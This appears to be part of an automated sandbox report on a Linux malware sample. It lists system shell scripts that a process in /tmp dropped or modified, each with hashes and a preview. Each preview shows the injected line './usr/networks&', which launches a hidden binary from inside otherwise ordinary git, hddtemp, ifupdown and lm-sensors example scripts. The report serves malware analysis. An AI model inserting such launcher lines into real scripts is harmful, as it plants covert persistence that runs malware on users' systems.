                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
                                                                                                                                MD5:84511195A8532AFAED8B6E6645B72FC9
                                                                                                                                SHA1:C424C15440A2C33C8559CF718B1C4B661D85BF52
                                                                                                                                SHA-256:47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
                                                                                                                                SHA-512:680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/git-resurrect.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2904
                                                                                                                                Entropy (8bit):5.006955417229927
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
                                                                                                                                MD5:E6A74480E370B07D5BDC026A624CE684
                                                                                                                                SHA1:988862444F28FAB3B4D6B92EC6C4F0488781EE2E
                                                                                                                                SHA-256:AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
                                                                                                                                SHA-512:93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                                                                                                /usr/share/doc/git/contrib/remotes2config.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/rerere-train.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):637
                                                                                                                                Entropy (8bit):4.973192610623575
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:wp6B2fHx3CXTuKQLcuSKHp+V/uwb+ctPKry/RhT6KHVB+8PfQyKwQgI2KkSr8n:HaR3U0Lp0VDbztPKITbfrCnMSg
                                                                                                                                MD5:FA973BE7DB66D335F781F10C137BD908
                                                                                                                                SHA1:DFFD51DB653BEF7DEA7D172F98830224F248E767
                                                                                                                                SHA-256:22ED58D049502A09B9CA39029671394257E5C2651094498A9D91B8BBBB4FB03E
                                                                                                                                SHA-512:74DE024F1503C58852597882F36B96CD697036A22943C26D1A1FD5F76A5CBEDEB384D7E88520547EB0788B718534BD9813FA3B25220B58D4F397050172568D64
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:"Learning from %h %s" "$commit"...git rerere...git checkout -q $commit -- ....git rerere..fi..git reset -q --hard.done..if test -z "$branch".then..git checkout "$original_HEAD".else..git checkout "${branch#refs/heads/}".fi../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/subtree/git-subtree.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):14967
                                                                                                                                Entropy (8bit):5.111069408805373
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:TVYbrTzRMebrfW0LJKEfUJzXKJ/38TQZNRgZpP1OQSABMfxn8R19mBhogLfbzxHY:+b1MebzW0Vx/Jhzg/MQ3D0fbtZA/1
                                                                                                                                MD5:41BA328EB77CD320A36423CADED05D12
                                                                                                                                SHA1:8393068799794472918236BBBB43BAAD72C7682F
                                                                                                                                SHA-256:1C6220B54F133F09F0E29C3BC4890CE7E3AF0AD29670672F1CD80448E2B9A779
                                                                                                                                SHA-512:A7DB8210828B6F0E59B1B73A46C0522E1552A49F956784CD5F001C8747FDF65E3255152B6BBFFCD4E6AB3CF0DDABA3BEBDF0B2D0CCA36B203A62EE2109D871E8
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug().{..if [ -n "$debug" ]; then...printf "%s\n" "$*" >&2..fi.}..say().{..if [ -z "$quiet" ]; then...printf "%s\n" "$*" >&2..fi.}..progress().{..if [ -z "$quiet" ]; then...printf "%s\r" "$*" >&2..fi.}..assert().{..if "$@"; then...:..else...die "assertion failed: " "$@"..fi.}...#echo "Options: $*"..while [ $# -gt 0 ]; do..opt="$1"..shift..case "$opt" in...-q) quiet=1 ;;...-d) debug=1 ;;...--annotate) annotate="$1"; shift ;;...--no-annotate) annotate= ;;...-b) branch="$1"; shift ;;...-P) prefix="${1%/}"; shift ;;...-m) message="$1"; shift ;;...--no-prefix) prefix= ;;...--onto) onto="$1"; shift ;;...--no-onto) onto= ;;...--rejoin) rejoin=1 ;;...--no-rejoin) rejoin= ;;...--ignore-joins) ignore_joins=1 ;;...--no-ignore-joins) ignore_joi
                                                                                                                                /usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):822
                                                                                                                                Entropy (8bit):5.456000973546581
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:w6vCJsHKfrLCYwTlFfOf4L3DXKPvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+UKXGRBmAF5I0Zl7
                                                                                                                                MD5:0D11588BAF66BBD90273FDA188DDA2CD
                                                                                                                                SHA1:EE2F4255479F30769F44E8CB5E284E632DD3B4AD
                                                                                                                                SHA-256:37757E412DB565E1A291349C036785A00ED5B89431A1598E6C16900BBCFFE356
                                                                                                                                SHA-512:991F89DD0AC1B1D3071F5103CAE959FCE46E608EA2F065F248D45727777265C49E30E865CCE16785B9565FD324BE23BCAD3B475A87FF5DCAE28067875CC9DB2E
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=`echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp'`..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):617
                                                                                                                                Entropy (8bit):4.789300168717738
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
                                                                                                                                MD5:13C31185F2BB9F9D26E363B9415D49B2
                                                                                                                                SHA1:5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
                                                                                                                                SHA-256:2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
                                                                                                                                SHA-512:050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/hddtemp/contribs/hddtemp-all.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1015
                                                                                                                                Entropy (8bit):4.896629241453442
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
                                                                                                                                MD5:87F1604CDCC54749A6A6D814FBB28530
                                                                                                                                SHA1:2E815968A4F6A0F92924E94C4D94BBE5F68BA871
                                                                                                                                SHA-256:E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
                                                                                                                                SHA-512:C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                                                                                                /usr/share/doc/ifupdown/examples/check-mac-address.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):461
                                                                                                                                Entropy (8bit):5.204671186006819
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:boybzOC2OPhB+NT3uGK6nRE9CLAYFyW4CK4jWb+YtYn:bo0PhcdW9CLKW4x4jWi/
                                                                                                                                MD5:590EDF96613EB2B783D98ED51A5F19A4
                                                                                                                                SHA1:3C6570765592737D02E8010FD9A159A39DCDCC38
                                                                                                                                SHA-256:BB77853D6FDBD37E5B234F1ECE3A223E07BDBE02CCEFC70D9FA6849ECB47F59A
                                                                                                                                SHA-512:6DC5C0F411328DE21CEFA82E8B1CD57CEE3AF5EDC0144860BEB2B291A534DFB1667B70E95D99586804D2489306377FF1F4B22C8A1D1A4E78353223717C5E47DD
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.# If it does it exits with 0 (success) status;.# if it doesn't then it exists with 1 (error) status...set -e..export LANG=C..if [ ! "$2" ] ; then..echo "Usage: $0 IFACE targetMAC"..exit 1.fi.iface="$1".targetmac=`echo "$2" | sed -e 'y/ABCDEF/abcdef/'`.mac=$(/sbin/ifconfig "$iface" | sed -n -e '/^.*HWaddr \([:[:xdigit:]\-]*\).*/{s//\1/;y/ABCDEF/abcdef/;p;q;}')..if [ "$targetmac" = "$mac" ]; then exit 0; else exit 1; fi../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/ifupdown/examples/get-mac-address.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):92
                                                                                                                                Entropy (8bit):4.373538165973413
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVCghzalTFgZNLdMRveMgoOORgn:whzalTFgZNpMRGMgTn
                                                                                                                                MD5:15DD9BBF0482D9ADCED6141F43FC3C89
                                                                                                                                SHA1:F4416E70988E52171A2F7027509F98AAE444E8B6
                                                                                                                                SHA-256:CB678F95B78104B7BD05D11C5AF75843331744E2EAB1504A32627FB30DE17238
                                                                                                                                SHA-512:39C8DD448D3D1F8C4BAECB16A395BC55EA2554E4ED627743FC26A76B12C750CE451BC3CE72AEFF94286A260DCB06AC016AE44F9BD3A12372F1DD31776783FE62
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/ifupdown/examples/pcmcia-compat.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):519
                                                                                                                                Entropy (8bit):5.218301073324955
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:5HUuJUHUd82RPHUAOBJ6gMWGwWSTsyzEblTKfahBUlTGNCgTn:50QU0NRP0L6g/gfbleqUlw
                                                                                                                                MD5:7CE36959719763E25A79EF6FBE77FD68
                                                                                                                                SHA1:3D32B1EF561E7CDD58B69D01B30F6F23D339805D
                                                                                                                                SHA-256:2C2DA71A12186FDDE2BDFAEA192105B1010C1279BB82334185690788E2EFAF79
                                                                                                                                SHA-512:4ACE6DF91473556C67C22C26FA905D93E6BB08D564851AC21BED82609DA4990D032FE81884214CDAA0A149FDEF4D2393CB2A02EE42CDA2743B9BD017918D6605
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.if [ ! -e /etc/pcmcia/shared ]; then exit 1; fi..pcmcia_shared () {... /etc/pcmcia/shared.}..iface="$1"..# /etc/pcmcia/shared sucks.pcmcia_shared "start" $iface.usage () {..exit 1.}..get_info $iface.HWADDR=`/sbin/ifconfig $DEVICE | sed -n -e 's/.*addr \([^ ]*\) */\1/p'`..which="".while read glob scheme; do..if [ "$which" ]; then continue; fi..case "$SCHEME,$SOCKET,$INSTANCE,$HWADDR" in...$glob) which=$scheme ;;..esac.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/ifupdown/examples/ping-places.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):633
                                                                                                                                Entropy (8bit):4.881818972878624
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:5EmBJQX+U2/lTxroNurUQm6k0fQmje5jrGlTGNCgTn:hQWldrK8Dq0o+e1Glw
                                                                                                                                MD5:99E4E569B07969486DA912C2B9A33E23
                                                                                                                                SHA1:3BAA43B8E0D2B693C426DDA2FA6D67DEAEADB09C
                                                                                                                                SHA-256:3C5803C83626B98195C7F48B7B83D131670DFA9541EDB8B30915C684FD39CCB9
                                                                                                                                SHA-512:8BAE9DC8E5F540044980649EF028FEF8C4FE945B05578EE1DB963A32AABC53F7D24FCD5DDB396FB9430E4CDFB6E1E6F19A535A1790072F5750D961F4FB8E3214
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.if [ `id -u` -ne 0 ] || [ "$1" = "" ]; then exit 1; fi..if [ -x /usr/bin/fping ]; then..PING="/usr/bin/fping".else..PING="/bin/ping -c 2".fi..iface="$1".which=""..while read addr pingme scheme; do..if [ "$which" ]; then continue; fi...#echo " Trying $addr & $pingme ($scheme)" >&2...ip addr add $addr dev $iface >/dev/null 2>&1..ip link set $iface up >/dev/null 2>&1...if $PING $pingme >/dev/null 2>&1; then...which="$scheme"...fi..ip link set $iface down >/dev/null 2>&1..ip addr del $addr dev $iface >/dev/null 2>&1.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/lm-sensors/examples/daemon/healthd.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):266
                                                                                                                                Entropy (8bit):4.736279036741599
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
                                                                                                                                MD5:E97AC4982B9BDFC8ED84ADA38E7BA000
                                                                                                                                SHA1:DE41A53FAE2E629E10235800917CDE6B2E0301AC
                                                                                                                                SHA-256:DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
                                                                                                                                SHA-512:B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2712
                                                                                                                                Entropy (8bit):5.4524991837552035
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
                                                                                                                                MD5:A148FED2694A1A82F4ABF9A28D0293DC
                                                                                                                                SHA1:4652F09BF1B6FB1859FB4816EFB666AE371C13E6
                                                                                                                                SHA-256:8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
                                                                                                                                SHA-512:9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                                                /usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2564
                                                                                                                                Entropy (8bit):5.346461718403454
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                                                                                                MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                                                                                                SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
                                                                                                                                SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
                                                                                                                                SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                                                /usr/share/doc/mdadm/examples/mdadd.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9649
                                                                                                                                Entropy (8bit):5.350733164859712
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:mjHnCbuuH+ycHcTK8K8Ks89tg8C8Wdq7cmwc9bVxoY2uwt6fqI9lAnVKS4ID7KMz:ms7hBBC7pWdSK6SI8KzK77
                                                                                                                                MD5:4E3AA249886275CE240D98F18CCB0B12
                                                                                                                                SHA1:0E0A966CB506E61DE4F27571D3D3EF973AE70A94
                                                                                                                                SHA-256:12D9472701FC5E974C36D6FB456F43063EC370CAB5AE42AF8E880C76031FD5B8
                                                                                                                                SHA-512:5117AEB0CA27616A88CDB5C358078C2DF29784037C9D0CDFFE55F54441EBDC81B19FF6CB1356355EC35DFCABE0FD4AC514B18227ED78D486F66054CAD9E226FE
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 2. fi.}...sanity_check().{. if [ "$(id -u)" != "0" ]; then . printf "\033[40m\033[1;31mERROR: Root check FAILED (you MUST be root to use this script)! Quitting...\n\033[0m" >&2. exit 1. fi.. check_binary mdadm. check_binary sfdisk. check_binary dd. check_binary awk. check_binary grep. check_binary sed. check_binary cat.. if [ -z "$SOURCE" ] || [ -z "$TARGET" ]; then. echo "ERROR: Bad or missing argument(s)" >&2. show_help;. exit 4. fi.. if ! echo "$SOURCE" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Source device $SOURCE does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if ! echo "$TARGET" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Target device $TARGET does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if echo "$SOURCE" |grep -q 'md[0-9]'; then. printf "\033[40m\033[1;31mERROR: The source device specified is an md-device! Quitting...\n\033[0m" >&2. e
                                                                                                                                /usr/share/doc/netcat-openbsd/examples/dist.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):46
                                                                                                                                Entropy (8bit):3.925523369006428
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                                                MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                                                SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                                                SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
